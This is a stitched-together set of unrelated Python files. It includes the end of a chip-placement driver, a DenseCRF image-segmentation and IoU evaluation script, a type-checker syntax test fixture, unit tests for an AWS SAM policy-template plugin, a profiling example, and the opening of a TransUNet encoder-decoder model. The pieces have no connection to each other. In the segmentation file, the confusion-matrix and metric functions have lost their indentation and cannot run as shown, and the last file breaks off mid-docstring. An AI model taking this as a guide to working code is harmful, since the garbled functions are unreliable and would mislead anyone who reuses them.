        print("[I] Use external detailed placement engine %s" % (params.detailed_place_engine))
        dp_out_file = gp_out_file.replace(".gp.pl", "")
        # add target density constraint if provided
        target_density_cmd = ""
        if params.target_density < 1.0:
            target_density_cmd = " -util %f" % (params.target_density)
        # BUG FIX: the flag logic was inverted — when legalize_flag /
        # detailed_place_flag requested the stage, the code passed the
        # -nolegal / -nodetail *suppression* switches. Pass the suppression
        # switch only when the stage is disabled.
        legalize = "" if params.legalize_flag else "-nolegal"
        detailed_place = "" if params.detailed_place_flag else "-nodetail"
        cmd = "%s -aux %s -loadpl %s %s -out %s -noglobal %s %s" % (params.detailed_place_engine, params.aux_file, gp_out_file, target_density_cmd, dp_out_file, legalize, detailed_place)
        print("[I] %s" % (cmd))
        tt = time.time()
        os.system(cmd)
        print("[I] detailed placement takes %.2f seconds" % (time.time()-tt))
        if params.plot_flag:
            # read solution and evaluate
            placedb.read_pl(dp_out_file+".ntup.pl")
            placedb.scale_pl(params.scale_factor)
            iteration = len(metrics)
            pos = placer.init_pos
            pos[0:placedb.num_physical_nodes] = placedb.node_x
            pos[placedb.num_nodes:placedb.num_nodes+placedb.num_physical_nodes] = placedb.node_y
            hpwl, density_overflow, max_density = placer.validate(placedb, pos, iteration)
            print("[I] iteration %4d, HPWL %.3E, overflow %.3E, max density %.3E" % (iteration, hpwl, density_overflow, max_density))
            placer.plot(params, placedb, iteration, pos)
    elif params.detailed_place_engine:
        print("[W] External detailed placement engine %s NOT found" % (params.detailed_place_engine))
if __name__ == "__main__":
    """
    @brief main function to invoke the entire placement flow.
    """
    params = Params.Params()
    params.printWelcome()
    # No argument or an explicit help flag: show usage and stop.
    if len(sys.argv) == 1 or '-h' in sys.argv[1:] or '--help' in sys.argv[1:]:
        params.printHelp()
        exit()
    elif len(sys.argv) != 2:
        # Exactly one JSON parameter file is expected.
        print("[E] One input parameters in json format in required")
        params.printHelp()
        exit()
    # load parameters
    params.load(sys.argv[1])
    print("[I] parameters = %s" % (params))
    # run placement
    tt = time.time()
    place(params)
    print("[I] placement takes %.3f seconds" % (time.time()-tt))
|
from __future__ import print_function
import cv2
import matplotlib.pyplot as plt
from skimage.color import rgb2gray
from skimage.color import gray2rgb
from pydensecrf.utils import unary_from_labels, create_pairwise_bilateral, create_pairwise_gaussian, unary_from_softmax
from skimage.io import imread, imsave
from six.moves import xrange
import datetime
from PIL import Image
import tensorflow as tf
import time
import numpy as np
import scipy.misc as misc
import pydensecrf.densecrf as dcrf
import denseCRF
def _read_annotation(filename):
    """Load an annotation image via ``_transform`` and append a trailing
    singleton axis (axis 3) so it stacks like a batch of channel-last maps.

    Args:
        filename: path to the annotation image on disk.

    Returns:
        np.ndarray: the resized annotation with one extra trailing dimension.
    """
    resized = _transform(filename)
    return np.expand_dims(resized, axis=3)
def _transform(filename):
    """Read an image from disk and resize it to 224x224 with nearest-neighbor.

    NOTE(review): ``scipy.misc.imread``/``imresize`` were deprecated in
    SciPy 1.0 and removed in 1.2/1.3 — this only runs on an old SciPy with
    Pillow installed; consider imageio/PIL if the environment is upgraded.
    """
    # 1. read image
    image = misc.imread(filename)
    # nearest-neighbor keeps discrete label values intact (no blending)
    resize_image = misc.imresize(image, [224, 224], interp='nearest')
    return np.array(resize_image)
def dense_crf(original_image, annotated_image, NUM_OF_CLASSESS, use_2d=True):
    """Refine softmax class scores with a DenseCRF and show/return the MAP labels.

    Args:
        original_image: RGB image; only shape[0], shape[1] are used for the grid.
        annotated_image: per-pixel class scores, shape (H, W, NUM_OF_CLASSESS).
        NUM_OF_CLASSESS: number of classes for the unary term.
        use_2d: unused in this variant — DenseCRF2D is always constructed.

    Returns:
        2-D (H, W) array of argmax class indices after 5 inference steps.
    """
    # Converting annotated image to RGB if it is Gray scale
    print(original_image.shape, annotated_image.shape)
    # Gives no of class labels in the annotated image
    #n_labels = len(set(labels.flat))
    n_labels = NUM_OF_CLASSESS
    # Setting up the CRF model
    d = dcrf.DenseCRF2D(
        original_image.shape[1], original_image.shape[0], n_labels)
    # get unary potentials (neg log probability)
    processed_probabilities = annotated_image
    # pydensecrf expects class-major layout (C, H, W)
    softmax = processed_probabilities.transpose((2, 0, 1))
    print(softmax.shape)
    # clip guards against log(0) on hard-zero probabilities
    U = unary_from_softmax(softmax, scale=None, clip=1e-5)
    U = np.ascontiguousarray(U)
    #U = unary_from_labels(labels, n_labels, gt_prob=0.7, zero_unsure=False)
    d.setUnaryEnergy(U)
    # This potential penalizes small pieces of segmentation that are
    # spatially isolated -- enforces more spatially consistent segmentations
    feats = create_pairwise_gaussian(
        sdims=(3, 3), shape=original_image.shape[:2])
    d.addPairwiseEnergy(feats, compat=3,
                        kernel=dcrf.DIAG_KERNEL,
                        normalization=dcrf.NORMALIZE_SYMMETRIC)
    # This creates the color-dependent features --
    # because the segmentation that we get from CNN are too coarse
    # and we can use local color features to refine them
    feats = create_pairwise_bilateral(sdims=(80, 80), schan=(13, 13, 13),
                                      img=original_image, chdim=2)
    d.addPairwiseEnergy(feats, compat=10,
                        kernel=dcrf.DIAG_KERNEL,
                        normalization=dcrf.NORMALIZE_SYMMETRIC)
    # Run Inference for 5 steps
    Q = d.inference(5)
    print(Q)
    #print(">>>>>>>>Qshape: ", Q.shape)
    # Find out the most probable class for each pixel.
    output = np.argmax(Q, axis=0).reshape(
        (original_image.shape[0], original_image.shape[1]))
    print(output.shape)
    # visualize the refined labeling (plt.show() blocks until closed)
    plt.subplot(240 + 1)
    plt.imshow(output, cmap=plt.get_cmap('nipy_spectral'))
    plt.show()
    return output
def crf(original_image, annotated_image, NUM_OF_CLASSESS, use_2d=True):
    """Refine softmax scores with a DenseCRF; return the MAP re-colorized and in gray.

    Args:
        original_image: RGB image, shape (H, W, 3).
        annotated_image: per-pixel class scores, shape (H, W, NUM_OF_CLASSESS).
        NUM_OF_CLASSESS: number of classes for the unary term.
        use_2d: must be True — there is no generic-CRF fallback, so False
            would raise NameError on `d` below.

    Returns:
        (colorized_map, gray_map): the MAP labeling mapped back through the
        color table, and its grayscale conversion.
    """
    # Converting annotated image to RGB if it is Gray scale
    # print("crf function")
    print(original_image.shape, annotated_image.shape)
    # Converting the annotations RGB color to single 32 bit integer
    annotated_label = annotated_image[:, :, 0] + \
        (annotated_image[:, :, 1] << 8) + \
        (annotated_image[:, :, 2] << 16)
    # Convert the 32bit integer color to 0, 1, 2, ... labels.
    # BUG FIX: unique must be taken over the packed labels (annotated_label),
    # not the raw image — matches image_crf() below. Previously the packed
    # label was computed and then ignored, so the color table was built from
    # per-channel values.
    colors, labels = np.unique(annotated_label, return_inverse=True)
    # Creating a mapping back to 32 bit colors
    colorize = np.empty((len(colors), 3), np.uint8)
    colorize[:, 0] = (colors & 0x0000FF)
    colorize[:, 1] = (colors & 0x00FF00) >> 8
    colorize[:, 2] = (colors & 0xFF0000) >> 16
    # Gives no of class labels in the annotated image
    n_labels = NUM_OF_CLASSESS
    # print("No of labels in the Image are ")
    # Setting up the CRF model
    if use_2d:
        d = dcrf.DenseCRF2D(
            original_image.shape[1],
            original_image.shape[0],
            n_labels)
        # get unary potentials (neg log probability)
        processed_probabilities = annotated_image
        # pydensecrf expects class-major layout (C, H, W)
        softmax = processed_probabilities.transpose((2, 0, 1))
        U = unary_from_softmax(softmax)
        # U = unary_from_labels(labels, n_labels, gt_prob=0.7, zero_unsure=False)
        d.setUnaryEnergy(U)
        # This adds the color-independent term, features are the locations
        # only.
        d.addPairwiseGaussian(sxy=(3, 3), compat=3, kernel=dcrf.DIAG_KERNEL,
                              normalization=dcrf.NORMALIZE_SYMMETRIC)
        # This adds the color-dependent term, i.e. features are (x,y,r,g,b).
        d.addPairwiseBilateral(sxy=(10, 10),
                               srgb=(13, 13, 13),
                               rgbim=original_image,
                               compat=10,
                               kernel=dcrf.DIAG_KERNEL,
                               normalization=dcrf.NORMALIZE_SYMMETRIC)
    # Run inference for 20 steps
    Q = d.inference(20)
    # Find out the most probable class for each pixel.
    MAP = np.argmax(Q, axis=0)
    # Convert the MAP (labels) back to the corresponding colors and save the image.
    # Note that there is no "unknown" here anymore, no matter what we had at
    # first.
    MAP = colorize[MAP, :]
    # Get output
    output = MAP.reshape(original_image.shape)
    output = rgb2gray(output)
    print(output.shape)
    plt.plot(output)
    #plt.imshow(crfoutput, cmap=plt.get_cmap('nipy_spectral'))
    plt.show()
    return MAP.reshape(original_image.shape), output
"""
Function which returns the labelled image after applying CRF
"""
# Original_image = Image which has to labelled
# Annotated image = Which has been labelled by some technique( FCN in this case)
# Output_image = The final output image after applying CRF
# Use_2d = boolean variable
# if use_2d = True specialised 2D functions will be applied
# else Generic functions will be applied
def image_crf(original_image, annotated_image, output_image, use_2d=True):
    """Refine a hard label image with a DenseCRF and write the result to disk.

    Unlike crf()/dense_crf() above, the unary term here comes from hard
    labels (unary_from_labels) rather than softmax scores.
    """
    # Converting annotated image to RGB if it is Gray scale
    if(len(annotated_image.shape) < 3):
        annotated_image = gray2rgb(annotated_image)
    # NOTE(review): debug artifact — writes a hard-coded file in the cwd
    imsave("testing2.png", annotated_image)
    # Converting the annotations RGB color to single 32 bit integer
    annotated_label = annotated_image[:, :, 0] + (
        annotated_image[:, :, 1] << 8) + (annotated_image[:, :, 2] << 16)
    # Convert the 32bit integer color to 0,1, 2, ... labels.
    colors, labels = np.unique(annotated_label, return_inverse=True)
    # Creating a mapping back to 32 bit colors
    colorize = np.empty((len(colors), 3), np.uint8)
    colorize[:, 0] = (colors & 0x0000FF)
    colorize[:, 1] = (colors & 0x00FF00) >> 8
    colorize[:, 2] = (colors & 0xFF0000) >> 16
    # Gives no of class labels in the annotated image
    n_labels = len(set(labels.flat))
    print("No of labels in the Image are ")
    print(n_labels)
    # Setting up the CRF model
    if use_2d:
        d = dcrf.DenseCRF2D(
            original_image.shape[1], original_image.shape[0], n_labels)
        # get unary potentials (neg log probability)
        U = unary_from_labels(labels, n_labels, gt_prob=0.7, zero_unsure=False)
        d.setUnaryEnergy(U)
        # This adds the color-independent term, features are the locations only.
        d.addPairwiseGaussian(sxy=(3, 3), compat=3, kernel=dcrf.DIAG_KERNEL,
                              normalization=dcrf.NORMALIZE_SYMMETRIC)
        # This adds the color-dependent term, i.e. features are (x,y,r,g,b).
        d.addPairwiseBilateral(sxy=(80, 80), srgb=(13, 13, 13), rgbim=original_image,
                               compat=10,
                               kernel=dcrf.DIAG_KERNEL,
                               normalization=dcrf.NORMALIZE_SYMMETRIC)
    # Run Inference for 5 steps
    Q = d.inference(5)
    # Find out the most probable class for each pixel.
    MAP = np.argmax(Q, axis=0)
    # Convert the MAP (labels) back to the corresponding colors and save the image.
    # Note that there is no "unknown" here anymore, no matter what we had at first.
    MAP = colorize[MAP, :]
    imsave(output_image, MAP.reshape(original_image.shape))
    return MAP.reshape(original_image.shape)
def final_crf(original_image, annotated_image, NUM_OF_CLASSESS, use_2d=True):
    """Softmax-unary DenseCRF refinement — variant of dense_crf() above that
    uses the DenseCRF2D convenience pairwise methods and sxy=(80, 80).

    Returns the 2-D (H, W) argmax label map after 5 inference steps.
    """
    # Converting annotated image to RGB if it is Gray scale
    print(original_image.shape, annotated_image.shape)
    # Gives no of class labels in the annotated image
    #n_labels = len(set(labels.flat))
    n_labels = NUM_OF_CLASSESS
    # Setting up the CRF model
    d = dcrf.DenseCRF2D(
        original_image.shape[1], original_image.shape[0], n_labels)
    # get unary potentials (neg log probability)
    processed_probabilities = annotated_image
    # pydensecrf expects class-major layout (C, H, W)
    softmax = processed_probabilities.transpose((2, 0, 1))
    print(softmax.shape)
    # clip guards against log(0) on hard-zero probabilities
    U = unary_from_softmax(softmax, scale=None, clip=1e-5)
    U = np.ascontiguousarray(U)
    #U = unary_from_labels(labels, n_labels, gt_prob=0.7, zero_unsure=False)
    d.setUnaryEnergy(U)
    # This adds the color-independent term, features are the locations
    # only.
    d.addPairwiseGaussian(sxy=(3, 3), compat=3, kernel=dcrf.DIAG_KERNEL,
                          normalization=dcrf.NORMALIZE_SYMMETRIC)
    # This adds the color-dependent term, i.e. features are (x,y,r,g,b).
    d.addPairwiseBilateral(sxy=(80, 80),
                           srgb=(13, 13, 13),
                           rgbim=original_image,
                           compat=10,
                           kernel=dcrf.DIAG_KERNEL,
                           normalization=dcrf.NORMALIZE_SYMMETRIC)
    # Run Inference for 5 steps
    Q = d.inference(5)
    print(Q)
    #print(">>>>>>>>Qshape: ", Q.shape)
    # Find out the most probable class for each pixel.
    output = np.argmax(Q, axis=0).reshape(
        (original_image.shape[0], original_image.shape[1]))
    print(output.shape)
    # visualize the refined labeling (plt.show() blocks until closed)
    plt.subplot(240 + 1)
    plt.imshow(output, cmap=plt.get_cmap('nipy_spectral'))
    plt.show()
    return output
def _calcCrossMat(gtimage, predimage, num_classes):
crossMat = []
for i in range(num_classes):
crossMat.append([0] * num_classes)
# print(crossMat)
height, width = gtimage.shape
for y in range(height):
# print(crossMat)
for x in range(width):
gtlabel = gtimage[y, x]
predlabel = predimage[y, x]
if predlabel >= num_classes or gtlabel >= num_classes:
print('gt:%d, pr:%d' % (gtlabel, predlabel))
else:
crossMat[gtlabel][predlabel] = crossMat[gtlabel][predlabel] + 1
return crossMat
def _calc_eval_metrics(gtimage, predimage, num_classes):
pixel_accuracy_ = 0
mean_accuracy = 0
meanFrqWIoU = 0
meanIoU = 0
per_class_pixel_accuracy = []
IoUs = []
FrqWIoU = []
for i in range(num_classes):
IoUs.append([0] * num_classes)
FrqWIoU.append([0] * num_classes)
per_class_pixel_accuracy.append([0] * num_classes)
try:
height, width = gtimage.shape
pixel_sum = height * width
class_intersections = []
gt_pixels = []
#check_size(predimage, gtimage)
# Check classes
# gt_labels, gt_labels_count = extract_classes(gtimage)
# print(gt_labels)
# pred_labels, pred_labels_count = extract_classes(predimage)
# print(pred_labels)
# assert num_classes == gt_labels_count
# print(num_classes, gt_labels_count, pred_labels_count)
# assert gt_labels_count == pred_labels_count
for label in range(num_classes): # 0--> 17
intersection = 0
union = 0
gt_class = 0
for y in range(height): # 0->223
for x in range(width): # =-->223
gtlabel = gtimage[y, x]
predlabel = predimage[y, x]
if predlabel >= num_classes or gtlabel >= num_classes:
print('gt:%d, pr:%d' % (gtlabel, predlabel))
else:
if(gtlabel == label and predlabel == label):
intersection = intersection + 1
if(gtlabel == label or predlabel == label):
union = union + 1
if(gtlabel == label):
gt_class = gt_class + 1
# Calculate per class pixel accuracy
if (gt_class == 0):
per_class_pixel_accuracy[label] = 0
else:
per_class_pixel_accuracy[label] = (
float)(intersection / gt_class)
# Calculate per class IoU and FWIoU
if(union == 0):
IoUs[label] = 0.0
FrqWIoU[label] = 0.0
else:
IoUs[label] = (float)(intersection) / union
FrqWIoU[label] = (float)(intersection * gt_class) / union
class_intersections.append(intersection)
gt_pixels.append(gt_class)
# Check pixels
# assert pixel_sum == get_pixel_area(gtimage)
# assert pixel_sum == np.sum(gt_pixels)
# print(pixel_sum, get_pixel_area(gtimage), np.sum(gt_pixels))
# Calculate mean accuracy and meanIoU
mean_accuracy = np.mean(per_class_pixel_accuracy)
meanIoU = np.mean(IoUs)
# hist = _calcCrossMat(gtimage, predimage, num_classes)
# num_cor_pix = np.diag(hist)
# # num of correct pixels
# num_cor_pix = np.diag(hist)
# # num of gt pixels
# num_gt_pix = np.sum(hist, axis=1)
# # num of pred pixels
# num_pred_pix = np.sum(hist, axis=0)
# # IU
# denominator = (num_gt_pix + num_pred_pix - num_cor_pix)
# print(np.sum(class_intersections), np.sum(num_cor_pix))
# Calculate pixel accuracy and mean FWIoU
if (pixel_sum == 0):
pixel_accuracy_ = 0
meanFrqWIoU = 0
else:
pixel_accuracy_ = (float)(np.sum(class_intersections)) / pixel_sum
meanFrqWIoU = (float)(np.sum(FrqWIoU)) / pixel_sum
except Exception as err:
print(err)
return pixel_accuracy_, mean_accuracy, meanIoU, meanFrqWIoU
# ---- script entry: refine pred.png against inp.png with a CRF, then evaluate ----
# input = _transform("in.png")
# input = np.ones((224, 224, 23))
# anno = _read_annotation("anno.png")
# anno = np.zeros((224, 224, 23))
# output = dense_crf(input, anno, 23)
# output = crf(input, anno, 23)
_, crfoutput = denseCRF.crf(
    "inp.png", "pred.png", "output.png", 23, use_2d=True)
#crfoutput = misc.imread("output.png")
#crfoutput = misc.imresize(crfoutput, [224, 224])
print(crfoutput.shape)
#crfoutput = np.argmax(crfoutput, axis=2)
# print(np.array([crfoutput]).astype(np.uint8))
#crfoutput = cv2.normalize(crfoutput, None, 0, 255, cv2.NORM_MINMAX)
print(np.unique(crfoutput))
# NOTE(review): the "gt" below is the prediction image itself — the metrics
# measure how much the CRF changed pred.png, not accuracy against real GT
gtimage = misc.imread("pred.png")
#gtimage = cv2.normalize(gtimage, None, 0, 255, cv2.NORM_MINMAX)
print(gtimage.shape)
print(np.unique(gtimage))
# crossmat = _calcCrossMat(gtimage, crfoutput.astype(np.uint8), 23)
# print(crossmat)
print(_calc_eval_metrics(gtimage.astype(np.uint8), crfoutput.astype(np.uint8), 23))
|
# This sample tests various forms of subscript expressions for
# syntax and semantic (type) errors.
from typing import List, TypeVar
_T = TypeVar("_T", list, tuple)
def func1(p1: List[int], p2: _T):
    # NOTE: this is a static-analysis test fixture — the "should generate"
    # comments are assertions about the type checker's output, and the
    # flagged lines (including the syntax errors) are intentional.
    a1 = p1[0]
    reveal_type(a1, expected_text="int")
    a2 = p1[:]
    reveal_type(a2, expected_text="list[int]")
    a3 = p1[1:]
    reveal_type(a3, expected_text="list[int]")
    a4 = p1[1:2]
    reveal_type(a4, expected_text="list[int]")
    a5 = p1[0:1:3]
    reveal_type(a5, expected_text="list[int]")
    a6 = p1[:3]
    reveal_type(a6, expected_text="list[int]")
    a7 = p1[::]
    reveal_type(a7, expected_text="list[int]")
    a8 = p1[::2]
    reveal_type(a8, expected_text="list[int]")
    # This should generate a syntax error.
    b1 = p1[0:1:3:4]
    # This should generate a syntax error.
    b2 = p1[0:::]
    # This should generate a type error.
    c1 = p1[:,]
    reveal_type(c1, expected_text="Unknown")
    # This should generate a type error.
    c2 = p1[:,:]
    reveal_type(c2, expected_text="Unknown")
    # This should generate a type error.
    c3 = p1[1,]
    reveal_type(c3, expected_text="Unknown")
    d1 = p2[0]
    reveal_type(d1, expected_text="Unknown")
|
from unittest import TestCase
from mock import Mock, MagicMock, patch, call
from samtranslator.plugins import BasePlugin
from samtranslator.model.function_policies import PolicyTypes, PolicyEntry
from samtranslator.model.exceptions import InvalidResourceException
from samtranslator.plugins.policies.policy_templates_plugin import PolicyTemplatesForFunctionPlugin
from samtranslator.policy_template_processor.exceptions import InsufficientParameterValues, InvalidParameterValues
class TestPolicyTemplatesForFunctionPlugin(TestCase):
    """Unit tests for PolicyTemplatesForFunctionPlugin.

    The PolicyTemplateProcessor dependency is replaced by a Mock in setUp, so
    these tests exercise only the plugin's own orchestration: resource-type
    filtering, template conversion, and error translation.
    """

    def setUp(self):
        # plugin under test, wired to a mocked template processor
        self._policy_template_processor_mock = Mock()
        self.plugin = PolicyTemplatesForFunctionPlugin(self._policy_template_processor_mock)

    def test_plugin_must_setup_correct_name(self):
        # Name is the class name
        expected_name = "PolicyTemplatesForFunctionPlugin"
        self.assertEqual(self.plugin.name, expected_name)

    def test_plugin_must_be_instance_of_base_plugin_class(self):
        self.assertTrue(isinstance(self.plugin, BasePlugin))

    def test_must_only_support_function_resource(self):
        function_type = "AWS::Serverless::Function"
        self.assertTrue(self.plugin._is_supported(function_type))

    def test_must_not_support_non_function_resources(self):
        resource_type = "AWS::Serverless::Api"
        self.assertFalse(self.plugin._is_supported(resource_type))

    @patch("samtranslator.plugins.policies.policy_templates_plugin.FunctionPolicies")
    def test_on_before_transform_resource_must_work_on_every_policy_template(self, function_policies_class_mock):
        # force the resource-type gate open so conversion logic is reached
        is_supported_mock = Mock()
        self.plugin._is_supported = is_supported_mock
        is_supported_mock.return_value = True
        function_policies_obj_mock = MagicMock()
        function_policies_class_mock.return_value = function_policies_obj_mock
        function_policies_class_mock.POLICIES_PROPERTY_NAME = "Policies"
        template1 = {
            "MyTemplate1": {
                "Param1": "value1"
            }
        }
        template2 = {
            "MyTemplate2": {
                "Param2": "value2"
            }
        }
        resource_properties = {
            "Policies": [template1, template2]
        }
        policies = [
            PolicyEntry(data=template1, type=PolicyTypes.POLICY_TEMPLATE),
            PolicyEntry(data=template2, type=PolicyTypes.POLICY_TEMPLATE),
        ]
        # Setup to return all the policies
        function_policies_obj_mock.__len__.return_value = 2
        function_policies_obj_mock.get.return_value = iter(policies)
        # These are the values returned on every call to `convert` method
        self._policy_template_processor_mock.convert.side_effect = [
            {"Statement1": {"key1": "value1"}},
            {"Statement2": {"key2": "value2"}},
        ]
        expected = [{"Statement1": {"key1": "value1"}}, {"Statement2": {"key2": "value2"}}]
        self.plugin.on_before_transform_resource("logicalId", "resource_type", resource_properties)
        # This will overwrite the resource_properties input array
        self.assertEqual(expected, resource_properties["Policies"])
        function_policies_obj_mock.get.assert_called_once_with()
        self._policy_template_processor_mock.convert.assert_has_calls([
            call("MyTemplate1", {"Param1": "value1"}),
            call("MyTemplate2", {"Param2": "value2"})
        ])

    @patch("samtranslator.plugins.policies.policy_templates_plugin.FunctionPolicies")
    def test_on_before_transform_resource_must_skip_non_policy_templates(self, function_policies_class_mock):
        is_supported_mock = Mock()
        self.plugin._is_supported = is_supported_mock
        is_supported_mock.return_value = True
        function_policies_obj_mock = MagicMock()
        function_policies_class_mock.return_value = function_policies_obj_mock
        function_policies_class_mock.POLICIES_PROPERTY_NAME = "Policies"
        template1 = {
            "MyTemplate1": {
                "Param1": "value1"
            }
        }
        template2 = {
            "MyTemplate2": {
                "Param2": "value2"
            }
        }
        # a managed policy must pass through untouched
        regular_policy = {"regular policy": "something"}
        resource_properties = {
            "Policies": [template1, regular_policy, template2]
        }
        policies = [
            PolicyEntry(data=template1, type=PolicyTypes.POLICY_TEMPLATE),
            PolicyEntry(data=regular_policy, type=PolicyTypes.MANAGED_POLICY),
            PolicyEntry(data=template2, type=PolicyTypes.POLICY_TEMPLATE),
        ]
        # Setup to return all the policies
        function_policies_obj_mock.__len__.return_value = 3
        function_policies_obj_mock.get.return_value = iter(policies)
        # These are the values returned on every call to `convert` method
        self._policy_template_processor_mock.convert.side_effect = [
            {"Statement1": {"key1": "value1"}},
            {"Statement2": {"key2": "value2"}},
        ]
        expected = [{"Statement1": {"key1": "value1"}}, {"regular policy": "something"}, {"Statement2": {"key2": "value2"}}]
        self.plugin.on_before_transform_resource("logicalId", "resource_type", resource_properties)
        # This will overwrite the resource_properties input array
        self.assertEqual(expected, resource_properties["Policies"])
        function_policies_obj_mock.get.assert_called_once_with()
        self._policy_template_processor_mock.convert.assert_has_calls([
            call("MyTemplate1", {"Param1": "value1"}),
            call("MyTemplate2", {"Param2": "value2"})
        ])

    @patch("samtranslator.plugins.policies.policy_templates_plugin.FunctionPolicies")
    def test_on_before_transform_must_raise_on_insufficient_parameter_values(self, function_policies_class_mock):
        is_supported_mock = Mock()
        self.plugin._is_supported = is_supported_mock
        is_supported_mock.return_value = True
        function_policies_obj_mock = MagicMock()
        function_policies_class_mock.return_value = function_policies_obj_mock
        template1 = {
            "MyTemplate1": {
                "Param1": "value1"
            }
        }
        resource_properties = {
            "Policies": template1
        }
        policies = [
            PolicyEntry(data=template1, type=PolicyTypes.POLICY_TEMPLATE)
        ]
        # Setup to return all the policies
        function_policies_obj_mock.__len__.return_value = 1
        function_policies_obj_mock.get.return_value = iter(policies)
        # processor errors must surface as InvalidResourceException
        self._policy_template_processor_mock.convert.side_effect = InsufficientParameterValues("message")
        with self.assertRaises(InvalidResourceException):
            self.plugin.on_before_transform_resource("logicalId", "resource_type", resource_properties)
        # Make sure the input was not changed
        self.assertEqual(resource_properties, {"Policies": {"MyTemplate1": { "Param1": "value1"}}})

    @patch("samtranslator.plugins.policies.policy_templates_plugin.FunctionPolicies")
    def test_on_before_transform_must_raise_on_invalid_parameter_values(self, function_policies_class_mock):
        is_supported_mock = Mock()
        self.plugin._is_supported = is_supported_mock
        is_supported_mock.return_value = True
        function_policies_obj_mock = MagicMock()
        function_policies_class_mock.return_value = function_policies_obj_mock
        template1 = {
            "MyTemplate1": {
                "Param1": "value1"
            }
        }
        resource_properties = {
            "Policies": template1
        }
        policies = [
            PolicyEntry(data=template1, type=PolicyTypes.POLICY_TEMPLATE)
        ]
        # Setup to return all the policies
        function_policies_obj_mock.__len__.return_value = 1
        function_policies_obj_mock.get.return_value = iter(policies)
        self._policy_template_processor_mock.convert.side_effect = InvalidParameterValues("message")
        with self.assertRaises(InvalidResourceException):
            self.plugin.on_before_transform_resource("logicalId", "resource_type", resource_properties)
        # Make sure the input was not changed
        self.assertEqual(resource_properties, {"Policies": {"MyTemplate1": { "Param1": "value1"}}})

    @patch("samtranslator.plugins.policies.policy_templates_plugin.FunctionPolicies")
    def test_on_before_transform_must_bubble_exception(self, function_policies_class_mock):
        is_supported_mock = Mock()
        self.plugin._is_supported = is_supported_mock
        is_supported_mock.return_value = True
        function_policies_obj_mock = MagicMock()
        function_policies_class_mock.return_value = function_policies_obj_mock
        template1 = {
            "MyTemplate1": {
                "Param1": "value1"
            }
        }
        resource_properties = {
            "Policies": template1
        }
        policies = [
            PolicyEntry(data=template1, type=PolicyTypes.POLICY_TEMPLATE)
        ]
        # Setup to return all the policies
        function_policies_obj_mock.__len__.return_value = 1
        function_policies_obj_mock.get.return_value = iter(policies)
        # unexpected exception types must NOT be swallowed or translated
        self._policy_template_processor_mock.convert.side_effect = TypeError('message')
        with self.assertRaises(TypeError):
            self.plugin.on_before_transform_resource("logicalId", "resource_type", resource_properties)
        # Make sure the input was not changed
        self.assertEqual(resource_properties, {"Policies": {"MyTemplate1": { "Param1": "value1"}}})

    def test_on_before_transform_resource_must_skip_unsupported_resources(self):
        is_supported_mock = Mock()
        data_mock = Mock()
        self.plugin._is_supported = is_supported_mock
        is_supported_mock.return_value = False
        self.plugin.on_before_transform_resource(data_mock, data_mock, data_mock)
        # Make sure none of the data elements were accessed, because the method returned immediately
        self.assertEqual([], data_mock.method_calls)

    @patch("samtranslator.plugins.policies.policy_templates_plugin.FunctionPolicies")
    def test_on_before_transform_resource_must_skip_function_with_no_policies(self, function_policies_class_mock):
        is_supported_mock = Mock()
        self.plugin._is_supported = is_supported_mock
        is_supported_mock.return_value = True
        function_policies_obj_mock = MagicMock()
        function_policies_class_mock.return_value = function_policies_obj_mock
        # Setup to return NO policies
        function_policies_obj_mock.__len__.return_value = 0
        self.plugin.on_before_transform_resource("logicalId", "resource_type", {})
        # Since length was zero, get() should never be called
        function_policies_obj_mock.get.assert_not_called()
|
"""This is just a simple example for testing cprofilev. To see cprofilev in
action, run
python -m cprofilev example_for_profiling.py
"""
import random
import time
def product(x, y):
    """Return the product of *x* and *y*."""
    result = x * y
    return result
def main():
    """Repeatedly scale x by a random factor in [0.5, 1.5) — loops forever.

    Exists purely to give cprofilev something to sample; interrupt to stop.
    """
    x = 1.
    while True:
        x = product(x, 0.5 + random.random())
        # keep the loop slow so the live profiler output stays readable
        time.sleep(0.1)


if __name__ == '__main__':
    main()
|
import torch
import torch.nn as nn
from einops import rearrange
from utils.vit import ViT
class EncoderBottleneck(nn.Module):
    """ResNet-style bottleneck block with a 1x1 projection shortcut.

    conv1(1x1) -> conv2(3x3, stride) -> conv3(1x1), each followed by
    BatchNorm; the input is projected by a strided 1x1 conv + BN and added
    to the main path before the final ReLU.
    """

    def __init__(self, in_channels, out_channels, stride=1, base_width=64):
        super().__init__()
        # projection shortcut so the residual add matches channels/resolution
        self.downsample = nn.Sequential(
            nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=stride, bias=False),
            nn.BatchNorm2d(out_channels)
        )
        width = int(out_channels * (base_width / 64))
        self.conv1 = nn.Conv2d(in_channels, width, kernel_size=1, stride=1, bias=False)
        self.norm1 = nn.BatchNorm2d(width)
        # BUG FIX: stride was hard-coded to 2 here while the shortcut used the
        # `stride` argument, so the default stride=1 crashed on the residual
        # add (spatial mismatch). All existing callers pass stride=2, for
        # which behavior is unchanged.
        self.conv2 = nn.Conv2d(width, width, kernel_size=3, stride=stride, groups=1, padding=1, dilation=1, bias=False)
        self.norm2 = nn.BatchNorm2d(width)
        self.conv3 = nn.Conv2d(width, out_channels, kernel_size=1, stride=1, bias=False)
        self.norm3 = nn.BatchNorm2d(out_channels)
        self.relu = nn.ReLU(inplace=True)

    def forward(self, x):
        x_down = self.downsample(x)
        x = self.conv1(x)
        x = self.norm1(x)
        x = self.relu(x)
        x = self.conv2(x)
        x = self.norm2(x)
        x = self.relu(x)
        x = self.conv3(x)
        x = self.norm3(x)
        # residual add, then final activation
        x = x + x_down
        x = self.relu(x)
        return x
class DecoderBottleneck(nn.Module):
    """Decoder stage: bilinear upsample, optional skip concat, two 3x3 convs.

    Each conv is followed by BatchNorm and ReLU; the skip tensor (if given)
    is concatenated channel-wise in front of the upsampled features.
    """

    def __init__(self, in_channels, out_channels, scale_factor=2):
        super().__init__()
        self.upsample = nn.Upsample(scale_factor=scale_factor, mode='bilinear', align_corners=True)
        conv_stack = [
            nn.Conv2d(in_channels, out_channels, kernel_size=3, stride=1, padding=1),
            nn.BatchNorm2d(out_channels),
            nn.ReLU(inplace=True),
            nn.Conv2d(out_channels, out_channels, kernel_size=3, stride=1, padding=1),
            nn.BatchNorm2d(out_channels),
            nn.ReLU(inplace=True),
        ]
        self.layer = nn.Sequential(*conv_stack)

    def forward(self, x, x_concat=None):
        upsampled = self.upsample(x)
        if x_concat is None:
            return self.layer(upsampled)
        # skip features go first, matching the expected in_channels split
        return self.layer(torch.cat([x_concat, upsampled], dim=1))
class Encoder(nn.Module):
    """TransUNet encoder: conv stem, three bottlenecks, then a ViT.

